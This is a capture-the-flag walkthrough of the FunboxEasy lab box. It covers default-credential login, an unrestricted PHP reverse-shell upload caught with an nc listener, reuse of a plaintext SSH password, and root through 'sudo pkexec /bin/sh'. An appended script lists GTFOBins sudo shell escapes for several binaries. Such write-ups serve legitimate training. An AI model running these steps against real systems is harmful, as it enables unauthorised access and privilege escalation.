Proving Grounds Play: FunboxEasy

RATING

Easy

ENUMERATION

First, we kick it off with our usual nmap scan for these types of boxes:

Command: nmap -sV -sC -T4 -Pn -p- 192.168.207.111

The scan shows ports 22 (SSH) and 80 (HTTP) open. Browsing to port 80 reveals only the default Apache2 page, so we move on to a directory brute-force with feroxbuster:

Command: feroxbuster -u http://192.168.207.111/ -w /usr/share/wordlists/dirb/common.txt -k --quiet -s 200

The -s 200 option restricts the output to 200 responses. Normally we would also include 301 and 302 redirects in the status-code filter, but it wasn't necessary here.

EXPLOITATION

We navigate to the /admin directory and find a login portal. We try a few default credentials and some basic SQL injection against the form, with no luck.

Navigating to /store, however, reveals another admin login portal:

Here the usual default credentials pay off, and admin:admin logs us in:

Once logged in, we can see there is a way to add a new book entry:

The form includes a file upload field, which immediately suggests an unrestricted file upload vulnerability:

Our first test submission fails with an error on publisherid; the field has to match an existing publisher rather than an arbitrary value:

We navigate over to the list of publishers and choose one:

We try again with the publisher set to Wrox and attach our PHP reverse shell as the upload (remember to set the listener IP and port in the shell before uploading):

And we have a successful upload:

We start a netcat listener first, then browse to http://192.168.207.111/store/books.php, which runs our uploaded PHP and hands us a shell:

Command: nc -nvlp 1234

PRIVILEGE ESCALATION

Looking around in /home/tony, we find a password.txt file. Inside it is a password for SSH:

We know from the nmap scan that port 22 is open, so we SSH in as tony with the newly discovered password:

Command: ssh tony@192.168.207.111

The login succeeds. Running sudo -l shows that tony can run pkexec as root:

Command: sudo -l

Checking GTFOBins, pkexec has a sudo entry: it will execute any program we name as root, so we use it to drop straight into a root shell:

Command: sudo pkexec /bin/sh
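As an added example (not part of the original write-up), here is a small shell script that does the check we just did by eye: it reads sudo -l output and flags binaries that GTFOBins lists with a sudo shell escape, printing the escape command for each. The sample sudo -l output, the hostname funbox, the extra tail rule and the list of covered binaries are constructed assumptions, not output captured from the target.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: scan `sudo -l` output for
# binaries that GTFOBins lists with a sudo shell escape (pkexec among them).
# SAMPLE_SUDO_L is constructed to mirror the write-up (tony may run pkexec as
# root); the hostname "funbox" and the tail rule are assumptions.

SAMPLE_SUDO_L='Matching Defaults entries for tony on funbox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tony may run the following commands on funbox:
    (ALL : ALL) /usr/bin/pkexec
    (ALL) NOPASSWD: /usr/bin/tail /var/log/syslog'

# escape_for NAME PATH: print the GTFOBins sudo shell escape for binary NAME
# (invoked via PATH), or return 1 if NAME has no escape in this short list.
escape_for() {
    case "$1" in
        ALL)        printf 'sudo /bin/sh\n' ;;   # rule allows any command at all
        pkexec|env) printf 'sudo %s /bin/sh\n' "$2" ;;
        bash|sh)    printf 'sudo %s\n' "$2" ;;
        vim|vi)     printf "sudo %s -c ':!/bin/sh'\n" "$2" ;;
        less|more)  printf 'sudo %s /etc/profile   # then type !/bin/sh\n' "$2" ;;
        find)       printf 'sudo %s . -exec /bin/sh \\; -quit\n' "$2" ;;
        awk)        printf "sudo %s 'BEGIN {system(\"/bin/sh\")}'\n" "$2" ;;
        *)          return 1 ;;
    esac
}

# find_sudo_escapes: read `sudo -l` output on stdin and print one line per
# sudo-runnable binary with a known escape, as "PATH: ESCAPE". If the rule
# pins command-line arguments, that is noted, because sudo will then only
# accept the binary with exactly those arguments.
find_sudo_escapes() {
    # Rule lines are the ones that start with a "(runas)" spec.
    grep -E '^[[:space:]]*\(' | while IFS= read -r line; do
        # Drop the "(runas)" spec and an optional tag such as NOPASSWD:,
        # leaving the comma-separated command list.
        cmds=$(printf '%s\n' "$line" \
            | sed -E 's/^[[:space:]]*\([^)]*\)[[:space:]]*//; s/^[A-Z_]+:[[:space:]]*//')
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
            cmd=${cmd#"${cmd%%[![:space:]]*}"}   # trim leading whitespace
            bin=${cmd%% *}                        # first token is the binary
            args=${cmd#"$bin"}                    # anything after it is pinned args
            esc=$(escape_for "${bin##*/}" "$bin") || continue
            if [ -n "$args" ]; then
                printf '%s: %s (rule pins arguments:%s)\n' "$bin" "$esc" "$args"
            else
                printf '%s: %s\n' "$bin" "$esc"
            fi
        done
    done
}

# Run against the constructed sample; on a real target pipe `sudo -l` in instead.
printf '%s\n' "$SAMPLE_SUDO_L" | find_sudo_escapes
```

On the sample this prints only the pkexec line, since tail has no shell escape. The list in escape_for is deliberately short; GTFOBins covers far more binaries, and a rule that pins arguments (the tail entry here) also blocks most escapes, so treat the output as a starting point to confirm by hand rather than a verdict.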

And… we are root and have our flag.